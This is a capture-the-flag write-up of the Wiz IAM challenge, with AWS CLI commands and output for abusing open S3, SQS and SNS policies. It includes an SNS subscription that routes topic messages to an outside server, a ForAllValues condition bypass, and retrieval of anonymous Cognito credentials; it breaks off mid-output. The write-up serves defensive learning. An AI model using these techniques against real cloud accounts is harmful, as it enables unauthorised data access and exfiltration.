Site: https://bigiamchallenge.com/

The Wiz IAM challenge contains six vulnerabilities caused by IAM misconfigurations. I wanted to use this small exercise to learn the basic principles of IAM vulnerabilities and the simple use of the AWS CLI. I referred to many write-ups and am recording the learning process here.


IAM (Identity and Access Management)

IAM security consists of policies and technologies designed to ensure that only authorized individuals gain access to the relevant resources within an organization.

AWS IAM (Identity and Access Management) is the identity and access management service in Amazon Web Services, used to manage permissions for and the security of access to AWS resources. IAM lets users interact with AWS; each user is given a unique credential (an Access Key ID and a Secret Access Key) for calling AWS services through the API or an SDK.

As I understand it, IAM is the authorization policy mechanism of a cloud service, and all the challenges in this competition are about authorization policies.

Buckets of Fun

We all know that public buckets are risky. But can you find the flag?

The policy for this challenge is as follows

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}

The first challenge is about S3, an object storage service. For an introduction to S3 see the cloud security wiki; here I pick some of the clearer descriptions from the official AWS documentation.

S3

Amazon S3 is an object storage service that stores data as objects within buckets. An object is a file and any metadata that describes the file. A bucket is a container for objects.

To store your data in Amazon S3, you first create a bucket and specify a bucket name and AWS Region. Then you upload your data to that bucket as objects in Amazon S3. Each object has a key (or key name), which is the unique identifier for the object within the bucket.

S3 provides features that you can configure to support your specific use case. For example, you can use S3 Versioning to keep multiple versions of an object in the same bucket, which allows you to restore objects that are accidentally deleted or overwritten.

Buckets and the objects in them are private and can be accessed only if you explicitly grant access permissions. You can use bucket policies, AWS Identity and Access Management (IAM) policies, access control lists (ACLs), and S3 Access Points to manage access.

An object is a file plus the metadata of that file; a bucket is the container that stores objects, and the storage is organized as a key-value mapping.

Buckets

A bucket is a container for objects stored in Amazon S3. You can store any number of objects in a bucket and can have up to 100 buckets in your account. To request a higher limit, visit the Service Quotas console.

Every object is stored in a bucket. For example, if the object named photos/puppy.jpg is stored in the DOC-EXAMPLE-BUCKET bucket in the US West (Oregon) Region, then it is addressable using the URL https://DOC-EXAMPLE-BUCKET.s3.us-west-2.amazonaws.com/photos/puppy.jpg. For more information, see Accessing a bucket.

When you create a bucket, you enter a bucket name and choose the AWS Region where the bucket will reside. After you create a bucket, you cannot change the name of the bucket or its Region. Bucket names must follow the bucket naming rules. You can also configure a bucket to use S3 Versioning or other storage management features.

The bucket in this example is DOC-EXAMPLE-BUCKET.

An object key (or key name) is the unique identifier for an object within a bucket. Every object in a bucket has exactly one key. The combination of a bucket, object key, and optionally a version ID (if S3 Versioning is enabled for the bucket) uniquely identifies each object. So you can think of Amazon S3 as a basic data map between "bucket + key + version" and the object itself.

Every object in Amazon S3 can be uniquely addressed through the combination of the web service endpoint, bucket name, key, and optionally a version. For example, in the URL https://DOC-EXAMPLE-BUCKET.s3.us-west-2.amazonaws.com/photos/puppy.jpg, DOC-EXAMPLE-BUCKET is the name of the bucket and photos/puppy.jpg is the key.

Version ID

When you enable S3 Versioning in a bucket, Amazon S3 generates a unique version ID for each object added to the bucket. Objects that already existed in the bucket when versioning was enabled have a version ID of null. If you modify these (or any other) objects with other operations, such as CopyObject or PutObject, the new objects get a unique version ID.

Back to the challenge: the policy is given, and we can see that both GetObject and ListBucket are allowed.

We can first try to access the bucket over HTTP

http://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com
http://s3.amazonaws.com/thebigiamchallenge-storage-9979f4b/

The response is as follows

<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
    <Name>thebigiamchallenge-storage-9979f4b</Name>
    <Prefix></Prefix>
    <Marker></Marker>
    <MaxKeys>1000</MaxKeys>
    <IsTruncated>false</IsTruncated>
    <Contents>
        <Key>files/flag1.txt</Key>
        <LastModified>2023-06-05T19:13:53.000Z</LastModified>
        <ETag>&quot;ee004573d2858ed66abf17d58d350b97&quot;</ETag>
        <Size>37</Size>
        <StorageClass>STANDARD</StorageClass>
    </Contents>
    <Contents>
        <Key>files/logo.png</Key>
        <LastModified>2023-06-08T19:18:24.000Z</LastModified>
        <ETag>&quot;c57e95e6d6c138818bf38daac6216356&quot;</ETag>
        <Size>81889</Size>
        <StorageClass>STANDARD</StorageClass>
    </Contents>
</ListBucketResult>

This bucket contains the flag; its key is files/flag1.txt, and it can be fetched directly over HTTP

https://s3.amazonaws.com/thebigiamchallenge-storage-9979f4b/files/flag1.txt
https://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com/files/flag1.txt

The AWS CLI can also be used; here I refer to the official documentation

To use the AWS CLI to access an S3 bucket or generate a listing of S3 buckets, use the ls command. When you list all of the objects in a bucket, note that you must have the s3:ListBucket permission.

To use this example command, replace DOC-EXAMPLE-BUCKET1 with the name of your bucket.

$ aws s3 ls s3://DOC-EXAMPLE-BUCKET1

The following example command lists all Amazon S3 buckets in your account:

$ aws s3 ls

ls lists all objects in a bucket. A useful extra parameter is --recursive, which recursively lists all subdirectories

> aws s3 ls s3://thebigiamchallenge-storage-9979f4b --no-sign-request
PRE files/
> aws s3 ls s3://thebigiamchallenge-storage-9979f4b --recursive --no-sign-request
2023-06-06 03:13:53 37 files/flag1.txt
2023-06-09 03:18:24 81889 files/logo.png

--no-sign-request is a global AWS CLI parameter. When it is used, the request is sent unsigned (anonymously), so the credentials configured via aws configure are not used; see aws help for details.

cp downloads objects

> aws s3 cp s3://thebigiamchallenge-storage-9979f4b . --recursive --no-sign-request
download: s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt to files\flag1.txt
download: s3://thebigiamchallenge-storage-9979f4b/files/logo.png to files\logo.png
> aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt . --no-sign-request
download: s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt to .\flag1.txt

Google Analytics

We created our own analytics system specifically for this challenge. We think it’s so good that we even used it on this page. What could go wrong?

Join our queue and get the secret flag.

The policy is as follows; here everyone is allowed to send and receive messages

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}

Following the documentation, we can receive a message; the message body contains a URL, and visiting it yields the flag

> aws sqs receive-message --queue-url http://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --attribute-names All --message-attribute-names All
{
"Messages": [
{
"MessageId": "41e10760-5871-4c5b-aaea-59010c7d2ba4",
"ReceiptHandle": "AQEBwiVDUEb8UM4leOkAGgRGaLPpy3z/dAkLF8SPpRTx4do4gaF6mwbONcXPhqa+8Jz5YKXPWm31W5a8zBIn5bGmTJqCDTMa8Th8p1dfWTpNqUphHosNPJNhc3/Obc78DCo1ABplO/MeXSiEi0LR99HBczRjnjWR1xOAyBi4F0bXtzukTsOq56r8CzE9e8CotAbue7VXWKVg8HBmRGKNkSszgLaew9QLsP5GrhtEJGf4OJSFzqBi6vleJ+YngEDlkuQ/fQYx2gqkoAYapsmkoiAdflCCRPB9wqgxnaInMwejnoftVln/QcckLbr5Bnsfzh4vnHkd/8epVq2jpWBocBIFZkmWOfeSOn5/Cw7RQcr9+QZKPYyFFFO5IiNE7wdNoWgsvtftXGr4EvpO+P3VlKxVLHf2w7KN6DEckiGmOp6Pa60=",
"MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
"Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\", \"IsAdmin\": true}",
"Attributes": {
"SenderId": "AROARK7LBOHXGHGQ5XCT5:tbic-wiz-send-flag-to-sqs-8d265a4",
"ApproximateFirstReceiveTimestamp": "1707577613324",
"ApproximateReceiveCount": "1",
"SentTimestamp": "1707577408514",
"AWSTraceHeader": "Root=1-65c79040-33028e32345c8edf4652928d;Parent=6768a5f22ae0e9c8;Sampled=0;Lineage=037bed70:0"
}
}
]
}

Messages can also be sent

> aws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --message-body "Information about the largest city in Any Region."
{
"MD5OfMessageBody": "b9dcd7f1d18238d2cce92a923f216b8d",
"MessageId": "0a25af9b-301a-40d5-b015-a68866928332"
}

Enable Push Notifications

We got a message for you. Can you get it?

The policy is as follows; this time it is an SNS topic

{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}

See the documentation

https://docs.aws.amazon.com/zh_cn/cli/latest/userguide/cli-services-sns.html

which includes the subscribe operation

https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sns/subscribe.html

We can specify the protocol as http and the endpoint as our own server, then append a GET parameter to get past the condition

> aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol http --notification-endpoint http://8.8.8.8:6666/123?a=@tbic.wiz.io

{
"SubscriptionArn": "pending confirmation"
}

The received message is as follows

POST /123?a=@tbic.wiz.io HTTP/1.1
x-amz-sns-message-type: SubscriptionConfirmation
x-amz-sns-message-id: 84232df1-56d4-48de-ad0c-7417323c9b71
x-amz-sns-topic-arn: arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications
Content-Type: text/plain; charset=UTF-8
Content-Length: 1623
Host: 8.8.8.8:6666
Connection: Keep-Alive
User-Agent: Amazon Simple Notification Service Agent
Accept-Encoding: gzip,deflate

{
"Type" : "SubscriptionConfirmation",
"MessageId" : "84232df1-56d4-48de-ad0c-7417323c9b71",
"Token" : "2336412f37fb687f5d51e6e2425ba1f2535152877bfd02db2257f12027545bf374ac8f1f526251b79fe6208b4c91e69bb3cf53470f584db5817ab4d85c6e7838fcb8a6955f01704dc6391997289bad1ae9ca39d5ae5dbeeb4cd3829e9e49f71318e274240db31569be2be6a76e7ea4865a7a0e2b04a712983ef3c9249303afd3",
"TopicArn" : "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Message" : "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message.",
"SubscribeURL" : "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2535152877bfd02db2257f12027545bf374ac8f1f526251b79fe6208b4c91e69bb3cf53470f584db5817ab4d85c6e7838fcb8a6955f01704dc6391997289bad1ae9ca39d5ae5dbeeb4cd3829e9e49f71318e274240db31569be2be6a76e7ea4865a7a0e2b04a712983ef3c9249303afd3",
"Timestamp" : "2024-02-29T16:24:10.735Z",
"SignatureVersion" : "1",
"Signature" : "Ioy3tQbU7rOIVp3MrhoGox9c+srUueB0tlyWhCUV0ly63q2yWIyx7iAzFPPRbAxgmWEQdrOMNrkDGnZjMPAVzYFLPoTlJ4/Bh3i+IzlaoVw6M/ai0Kfd4gvAQi1ij8/cevC7fQD+NZsA89r7/smn7JWb16lcHtAJKGX/o9ne1BEqWA8B94dQGTCAwVXXP8t1h01A9q1O6uotgUZT/uVMXGbbTgTBXWkLbfCk8SCb0TU1xON1bRxahswB4zMFF25I3XS0m4BSUbiZa9Zoo+npbcx4GnKxHrgUmzBwgND2VVju8y44OZwJjWIWjNH0dcspvPl5/NSwti3IXt9zPwUh/g==",
"SigningCertURL" : "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-60eadc530605d63b8e62a523676ef735.pem"
}

We need to visit a URL to confirm the subscription. I tried it in a browser and it didn't seem to work, so we switch to the AWS CLI

> aws sns confirm-subscription --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --token 2336412f37fb687f5d51e6e2425ba1f2535152877bfd02db23d77aa3261dd2c97744e0fd0fb2c72f1ad884ee1aca8a583548faaa91c7443e8c57f26c81f5e150cf9e9be8220b7cb8d75ae7f9344292f200c00e504c52af20d5ae1ee5f025e046af2cb4711193103b8eaa618a1c58f1a99a9ccd9ff27f84dc58dfb4ea22cc3d49

Then another message arrives, and it contains the flag

POST /123?a=@tbic.wiz.io HTTP/1.1
x-amz-sns-message-type: Notification
x-amz-sns-message-id: 64a63cc3-7622-5c52-b8fd-6299c25eb6ba
x-amz-sns-topic-arn: arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications
x-amz-sns-subscription-arn: arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications:4c7fd5ce-ca3d-436e-9bbc-4df0a31537c9
Content-Type: text/plain; charset=UTF-8
X-Amzn-Trace-Id: Root=1-65e0b23c-4f6a33867ab940ac25389d3b;Parent=73b0db320ef6811a;Sampled=0;Lineage=36680206:0
Content-Length: 963
Host: 8.8.8.8:6666
Connection: Keep-Alive
User-Agent: Amazon Simple Notification Service Agent
Accept-Encoding: gzip,deflate

{
"Type" : "Notification",
"MessageId" : "64a63cc3-7622-5c52-b8fd-6299c25eb6ba",
"TopicArn" : "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Message" : "{wiz:always-suspect-asterisks}",
"Timestamp" : "2024-02-29T16:35:08.609Z",
"SignatureVersion" : "1",
"Signature" : "jiQRsI+7CY4HIWASbn3C8pPdFJi1hobYQ4P0a3Ij7UENSeUwq5JTj3cNTE4KMp3w/E1JLNa7+76641qoKHaZBCBS/jVVW7mGF+NacLPwT/ydppUOhXt8a677nkODXiNSg0o/BaAcU6KboUTFhM2YIIO5EKmDRew/71riDQvIisMixcARYTfXNxFSt+Rr0XJPpdOPtyD8wleIEo5IU9H4d9HL20yBqI4MLHtu/iPFLtyjogbjKrOhpNJva+3hKTY2FeGr1vwWqGnfv/T8oZ36twZvzEgxamBVvKSIHgDU+nJlQQ77REuR4jxyyCZrqFx+00+GvMK5GrzekpKHADntwA==",
"SigningCertURL" : "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-60eadc530605d63b8e62a523676ef735.pem",
"UnsubscribeURL" : "https://sns.us-east-1.amazonaws.com/?Action=Unsubscribe&SubscriptionArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications:4c7fd5ce-ca3d-436e-9bbc-4df0a31537c9"
}

Admin only?

We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?

Again an S3 bucket; the difference is that this policy restricts ls to user/admin, while get is unrestricted

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}

Listing the root of the bucket returns Access Denied

> aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321 --no-sign-request

An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied

But files/ can be listed. This is strange: we are not admin, so why can we ls it directly?

> aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request

2023-06-08 03:15:43 42 flag-as-admin.txt
2023-06-09 03:20:01 81889 logo-admin.png

We can try again with s3api

> aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --prefix files/ --no-sign-request
{
"Contents": [
{
"Key": "files/flag-as-admin.txt",
"LastModified": "2023-06-07T19:15:43+00:00",
"ETag": "\"e365cfa7365164c05d7a9c209c4d8514\"",
"Size": 42,
"StorageClass": "STANDARD"
},
{
"Key": "files/logo-admin.png",
"LastModified": "2023-06-08T19:20:01+00:00",
"ETag": "\"c57e95e6d6c138818bf38daac6216356\"",
"Size": 81889,
"StorageClass": "STANDARD"
}
],
"RequestCharged": null
}

The reason lies in the condition operator ForAllValues:StringLike; see the documentation at https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_condition-single-vs-multi-valued-context-keys.html

ForAllValues is a qualifier on StringLike: when the incoming context key has multiple values, every one of them must match. But if the key we send is missing or empty, the condition evaluates to true and the restriction is bypassed.

ForAllValues – This qualifier tests whether the value of every member of the request set is a subset of the condition context key set. The condition returns true if every context key value in the request matches at least one context key value in the policy. It also returns true if there are no context keys in the request or if the context key value resolves to an empty data set, such as an empty string. To prevent missing context keys or context keys with empty values from evaluating to true, you can include the Null condition operator in your policy with a false value to check whether the context key exists and its value is not null.

Use caution if you use ForAllValues with an Allow effect, because the policy can be overly permissive if a missing context key or a context key with an empty value unexpectedly appears in the request context. You can include the Null condition operator in your policy with a false value to check whether the context key exists and its value is not null. For an example, see Controlling access based on tag keys.

Finally, the object can be accessed directly

https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt

s3api works as well

aws s3api get-object --bucket thebigiamchallenge-admin-storage-abf1321 --key files/flag-as-admin.txt a.txt --no-sign-request
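To make the two condition failures above concrete ("Enable Push Notifications" and "Admin only?"), here is an added Python model of the documented IAM condition semantics; it is not code from the challenge or from AWS, only a simplified re-implementation of StringLike, StringEquals, Null and the ForAllValues:/ForAnyValue: qualifiers. It evaluates the page's own Condition blocks against constructed request contexts and shows the corrected forms: pinning sns:Protocol to email next to the sns:Endpoint pattern, and either using the plain single-valued operator on aws:PrincipalArn or adding the Null guard the docs recommend.

```python
import fnmatch
from typing import Dict, List, Union

# A request context maps each condition key to zero or more values.
Context = Dict[str, List[str]]
Condition = Dict[str, Dict[str, Union[str, List[str]]]]


def _match(op: str, value: str, patterns: List[str]) -> bool:
    """Single-value string comparison for the two operators the challenge uses."""
    if op == "StringEquals":
        return value in patterns
    if op == "StringLike":
        # IAM StringLike: '*' and '?' wildcards, case-sensitive.
        return any(fnmatch.fnmatchcase(value, p) for p in patterns)
    raise ValueError(f"unsupported operator: {op}")


def evaluate_condition(condition: Condition, ctx: Context) -> bool:
    """Return True when every clause of the Condition block matches the request context."""
    for raw_op, clauses in condition.items():
        qualifier, _, op = raw_op.rpartition(":")  # "" or ForAllValues / ForAnyValue
        for key, raw_patterns in clauses.items():
            patterns = [raw_patterns] if isinstance(raw_patterns, str) else list(raw_patterns)
            values = ctx.get(key, [])
            if op == "Null":
                # "Null": {"key": "false"} demands that the key exists with a value.
                key_should_be_missing = patterns[0].lower() == "true"
                if (len(values) == 0) != key_should_be_missing:
                    return False
            elif qualifier == "ForAllValues":
                # Every request value must match; no values at all is vacuously true.
                if not all(_match(op, v, patterns) for v in values):
                    return False
            elif qualifier == "ForAnyValue":
                if not any(_match(op, v, patterns) for v in values):
                    return False
            else:
                # Plain operator: a missing key simply fails to match.
                if not any(_match(op, v, patterns) for v in values):
                    return False
    return True


# --- "Enable Push Notifications": the page's condition and a pinned-protocol variant ---
SNS_WEAK = {"StringLike": {"sns:Endpoint": "*@tbic.wiz.io"}}
SNS_FIXED = {"StringLike": {"sns:Endpoint": "*@tbic.wiz.io"},
             "StringEquals": {"sns:Protocol": "email"}}

# Request contexts (constructed from the page's subscribe call and a normal e-mail subscriber).
SNS_HTTP_REQUEST = {"sns:Endpoint": ["http://8.8.8.8:6666/123?a=@tbic.wiz.io"],
                    "sns:Protocol": ["http"]}
SNS_EMAIL_REQUEST = {"sns:Endpoint": ["someone@tbic.wiz.io"], "sns:Protocol": ["email"]}

# --- "Admin only?": the page's condition and two corrected forms ---
ADMIN_ARN = "arn:aws:iam::133713371337:user/admin"
ADMIN_WEAK = {"StringLike": {"s3:prefix": "files/*"},
              "ForAllValues:StringLike": {"aws:PrincipalArn": ADMIN_ARN}}
# aws:PrincipalArn is single-valued, so the plain operator is the right one ...
ADMIN_FIXED = {"StringLike": {"s3:prefix": "files/*", "aws:PrincipalArn": ADMIN_ARN}}
# ... or keep ForAllValues and refuse a missing/empty key, as the AWS docs suggest.
ADMIN_NULL_GUARD = {"StringLike": {"s3:prefix": "files/*"},
                    "ForAllValues:StringLike": {"aws:PrincipalArn": ADMIN_ARN},
                    "Null": {"aws:PrincipalArn": "false"}}

ANON_LIST_FILES = {"s3:prefix": ["files/"]}  # --no-sign-request: no principal key at all
ANON_LIST_ROOT: Context = {}                 # no prefix either
ADMIN_LIST_FILES = {"s3:prefix": ["files/"], "aws:PrincipalArn": [ADMIN_ARN]}
OTHER_USER_LIST = {"s3:prefix": ["files/"],
                   "aws:PrincipalArn": ["arn:aws:iam::133713371337:user/bob"]}


def report() -> Dict[str, bool]:
    """Evaluate each (policy, request) pair; keys read as 'policy/request'."""
    cases = {
        "sns_weak/http": (SNS_WEAK, SNS_HTTP_REQUEST),
        "sns_fixed/http": (SNS_FIXED, SNS_HTTP_REQUEST),
        "sns_fixed/email": (SNS_FIXED, SNS_EMAIL_REQUEST),
        "admin_weak/anon_files": (ADMIN_WEAK, ANON_LIST_FILES),
        "admin_weak/anon_root": (ADMIN_WEAK, ANON_LIST_ROOT),
        "admin_weak/other_user": (ADMIN_WEAK, OTHER_USER_LIST),
        "admin_fixed/anon_files": (ADMIN_FIXED, ANON_LIST_FILES),
        "admin_fixed/admin": (ADMIN_FIXED, ADMIN_LIST_FILES),
        "admin_null_guard/anon_files": (ADMIN_NULL_GUARD, ANON_LIST_FILES),
        "admin_null_guard/admin": (ADMIN_NULL_GUARD, ADMIN_LIST_FILES),
    }
    return {name: evaluate_condition(cond, ctx) for name, (cond, ctx) in cases.items()}


if __name__ == "__main__":
    for name, allowed in report().items():
        print(f"{name:30s} {'ALLOW' if allowed else 'DENY'}")
```

The anonymous ls of files/ that puzzled us above is the "admin_weak/anon_files" row: no aws:PrincipalArn value is present, so ForAllValues has nothing to check and passes, while the root listing still fails on the s3:prefix clause.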

Do I know you?

We configured AWS Cognito as our main identity provider. Let’s hope we didn’t make any mistakes.

This challenge's policy is different: it has no Principal, which means it is an identity-based policy attached to an IAM identity, rather than attached to a resource as in the previous challenges.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}

Let's briefly analyze this policy with the documentation: first, this identity is allowed to perform the mobileanalytics PutEvents action and every cognito-sync action, and it may also perform GetObject and ListBucket on the wiz-privatefiles bucket.

See also https://www.wangan.com/p/7fy7f8abba5c0234

The challenge also provides a signed image, which happens to be an object in the wiz-privatefiles bucket

Signed img from S3

https://wiz-privatefiles.s3.amazonaws.com/cognito1.png?AWSAccessKeyId=ASIARK7LBOHXO65L4DXI&Expires=1709230341&Signature=PxzKu%2FhNS2SIy4Tka4T4rCeroOk%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECIaCXVzLWVhc3QtMSJHMEUCIQCu5PYZngsNEsceFs7sMRPAbnn%2FtQe9hJRwhRmbPYZ1YAIgIKIfvsfoixNe7Sn1ed3u5spX8gcfwra5aXwNM6vZlFgqyAUIGhAAGgwwOTIyOTc4NTEzNzQiDHKkZJj5UeMVKtT2%2FyqlBfgZWpc6hEKDeg0DjoXa4v4GgQyufMmd7AFKuIF58FwvAlpZ%2BBgm%2BLTwUVJMPfHA7EtKUdhonBBDeclK%2F1XUmYgMRQgnbIRHJ%2FC9I7NALezH%2Fq%2B0XsbRGeFOqAocgngygKm67A0IXhlS2JTQ3kg3LfSj9At5LICbHWNQWiJu8OIHEhzuUFx60zNwx%2FOBiR3%2F8Xi3yV7nXz5%2BDV%2FUHVG0EiDMGPXDNhL%2Bj76vio1NWCzDQ8ljCno%2BeWtR0R%2FCSDRO7gZBkUi5%2FstWjiykKMc18qwUYcgNSH7dDjA2iHRWY9LWLkGojko1LHZc9WOAPMaGnvASDVMRWSj%2F8mQo5Bxg30%2BB7NoGwrnmE0VzFE5m%2BRkBm%2BP3MB4fMeq%2FYbMIyxW7x1okGfhS7pqocG2wE1oSDp6c9LM5AfLIcq7%2FADvEJKZLL0X0pQdlSYkzUxlwuy5KjCl7%2F%2FnPEQxJVqHJyI0Z8K1rwRogAlEYmWafBcEBlgnH69Qvi6KWuDOC6hVOWBCDwPdj7dZ%2BXZQuCsxg7sa1CtVIjllr4H6LfJtcYbcCEcQJccXC%2BwpLpIfQwh9OsrZrKQShf%2B%2B9612HJzRzaRttTnUIRpgkQUFX9n556EFoE0CmJzHnDLmxh35TOE9MlWoipKs2vD%2BhMW862LLQxHVBBP60HOIyqx9SIx33L1d9cfcWLBitLtqxv4grX25jq7sLX4g0tBxiXo1H2uhZSB%2B1V3K5aXQjHo1LwkiLkehZyxdweULLCJ0MU%2BeTQuWjn4680bOALCc6ihRfRp0rqi4x1GfSQVdPbG4pUiAxUy70lvV%2B35KNX%2Bn9UMP%2F5m7YJVRTYrP1z4ngLg54wrWat6PMXM7HfBZLJgr3QYY4EbORVE7ehdW3rKIB37gCCOHxiJpSwydhN58SMPX1gq8GOt4C2wHgZXe%2F41ySi45jEra9mCp1fy%2BHV2szWPuHeu26misKJT%2FR1tyLeegYWdCVKZFJFM4yETKlzkDTfZ1lcKHfvVrUjN3QBTCzjlaqJOjS999z3ccTJbSpmunHlZSYnYXAjuKraPsMZlDJe5hB4waxdH5WNzif4mE3jMsg%2FkMxrFmrLWStZLEdz9vi4vQRsMdnVcCFLzQ4bMQ9kOFuX3WNbouxNlsblamfImdbRO0pb1XCvXPDAHLofHTLR46kBeimNJC6muT7%2FnvYZHghkgaMlaldxEZqiFVfGjhhSF7Bq8EbfmmaRCCjg95UoroCSIKnKrItGmKaDTivyud2GdEanRcwxG12hI5HgMfmBDgxZxWLwutKWWBLgeNPOqyE%2FxZ44uIUUSszP0eeob4oFkXSatpo8LV8tl0M3VUn%2B%2Fzo8fC4LgH5tZxSxf3aBQMUkFKsRu5bqRP0MyQIYJ9mwIY%3D

Trying ls or accessing objects gives AccessDenied. Note, however, that the image above is fetched with some special parameters added

AWSAccessKeyId
Expires
Signature
x-amz-security-token

These parameters are not hard-coded in the front end, so let's look at how they are generated

<img style="width: 16rem" id="signedImg" class="mx-auto mt-4" src="#" alt="Signed img from S3" />
<script src="https://sdk.amazonaws.com/js/aws-sdk-2.719.0.min.js"></script>
<script>
    AWS.config.region = 'us-east-1';
    AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
    // Set the region
    AWS.config.update({region: 'us-east-1'});

    $(document).ready(function() {
        var s3 = new AWS.S3();
        params = {
            Bucket: 'wiz-privatefiles',
            Key: 'cognito1.png',
            Expires: 60 * 60
        }

        signedUrl = s3.getSignedUrl('getObject', params, function (err, url) {
            $('#signedImg').attr('src', url);
        });
    });
</script>

From this we obtain the IdentityPoolId. The front-end logic first obtains an identity ID from this identity pool (the pool allows anonymous access), uses that ID to request credentials, and then signs with those credentials in the browser to produce a URL for cognito1.png. We can follow the same flow to obtain credentials ourselves.

See also the Cognito authentication flow in the documentation

https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/authentication-flow.html

Following the documentation, we first use get-id to obtain an identity ID

> aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

{
"IdentityId": "us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5"
}

get-open-id-token returns an OpenID token, though it doesn't seem to be of much use here

> aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5

{
"IdentityId": "us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5",
